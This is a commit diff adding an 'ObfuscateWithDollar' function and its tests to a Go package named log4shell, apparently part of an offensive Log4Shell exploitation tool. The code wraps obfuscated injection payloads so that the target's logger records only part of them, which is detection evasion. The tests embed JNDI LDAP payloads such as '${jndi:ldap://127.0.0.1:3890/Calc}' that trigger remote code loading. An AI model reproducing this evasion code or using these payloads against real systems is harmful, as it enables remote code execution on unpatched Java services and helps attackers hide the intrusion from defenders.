add ObfuscateWithDollar for hide obfuscated malicious(payload) string that logger record.

Author: For-ACGN

obfuscate.go

@@ -127,3 +127,20 @@ func Obfuscate(raw string, token bool) (string, string) {
 
 	return obfuscated.String(), rwt
 }
+
+// ObfuscateWithDollar will obfuscate malicious(payload) string, and
+// add a dollar symbol before one string like "${xxx-xxx:-section}".
+// When add one Dollar, repeat execute will not appear and the logger
+// will not print the whole obfuscated string, just a little, but I
+// don't know why this happened, It may cause unexpected situations,
+// so it is disabled by default.
+func ObfuscateWithDollar(raw string, token bool) (string, string) {
+	obfuscated, rwt := Obfuscate(raw, token)
+	if strings.Count(obfuscated, "${") < 2 || !strings.Contains(rwt, "$") {
+		return obfuscated, rwt
+	}
+	// add one "$" to before the last "${"
+	idx := strings.LastIndex(obfuscated, "${")
+	obfuscated = obfuscated[:idx] + "$" + obfuscated[idx:]
+	return obfuscated, rwt
+}

obfuscate_test.go

@@ -2,6 +2,7 @@ package log4shell
 
 import (
 	"fmt"
+	"strings"
 	"testing"
 
 	"github.com/stretchr/testify/require"
@@ -21,6 +22,9 @@ func TestObfuscate(t *testing.T) {
 				fmt.Println(rwt)
 				fmt.Println(obfuscated)
 				fmt.Println()
+
+				// check exist bug "$" with "${"
+				require.NotContains(t, obfuscated, "$${")
 			})
 
 			t.Run("without token", func(t *testing.T) {
@@ -29,6 +33,9 @@ func TestObfuscate(t *testing.T) {
 				require.Zero(t, rwt)
 				fmt.Println(obfuscated)
 				fmt.Println()
+
+				// check exist bug "$" with "${"
+				require.NotContains(t, obfuscated, "$${")
 			})
 		}
 	})
@@ -73,3 +80,72 @@ func TestObfuscate(t *testing.T) {
 		})
 	})
 }
+
+func TestObfuscateWithDollar(t *testing.T) {
+	t.Run("common", func(t *testing.T) {
+		for _, testdata := range [...]string{
+			"${jndi:ldap://127.0.0.1:3890/Calc}",
+			"${jndi:ldap://127.0.0.1:3890/Notepad}",
+			"${jndi:ldap://127.0.0.1:3890/Nop}",
+			"test",
+		} {
+			t.Run("with token", func(t *testing.T) {
+				obfuscated, rwt := ObfuscateWithDollar(testdata, true)
+				fmt.Println(testdata)
+				fmt.Println(rwt)
+				fmt.Println(obfuscated)
+				fmt.Println()
+
+				require.Equal(t, 1, strings.Count(obfuscated, "$${"))
+			})
+
+			t.Run("without token", func(t *testing.T) {
+				obfuscated, rwt := ObfuscateWithDollar(testdata, false)
+				fmt.Println(testdata)
+				require.Zero(t, rwt)
+				fmt.Println(obfuscated)
+				fmt.Println()
+
+				require.NotContains(t, obfuscated, "$${")
+			})
+		}
+	})
+
+	t.Run("empty raw string", func(t *testing.T) {
+		t.Run("with token", func(t *testing.T) {
+			obfuscated, rwt := ObfuscateWithDollar("", true)
+			require.Zero(t, rwt)
+			require.Zero(t, obfuscated)
+		})
+
+		t.Run("without token", func(t *testing.T) {
+			obfuscated, rwt := ObfuscateWithDollar("", false)
+			require.Zero(t, rwt)
+			require.Zero(t, obfuscated)
+		})
+	})
+
+	t.Run("fuzz", func(t *testing.T) {
+		t.Run("with token", func(t *testing.T) {
+			for i := 0; i < 100000; i++ {
+				raw := "${" + randString(64) + "}"
+				obfuscated, rwt := ObfuscateWithDollar(raw, true)
+				require.NotZero(t, rwt)
+				require.NotZero(t, obfuscated)
+
+				require.Equal(t, 1, strings.Count(obfuscated, "$${"))
+			}
+		})
+
+		t.Run("without token", func(t *testing.T) {
+			for i := 0; i < 100000; i++ {
+				raw := "${" + randString(64) + "}"
+				obfuscated, rwt := ObfuscateWithDollar(raw, false)
+				require.Zero(t, rwt)
+				require.NotZero(t, obfuscated)
+
+				require.NotContains(t, obfuscated, "$${")
+			}
+		})
+	})
+}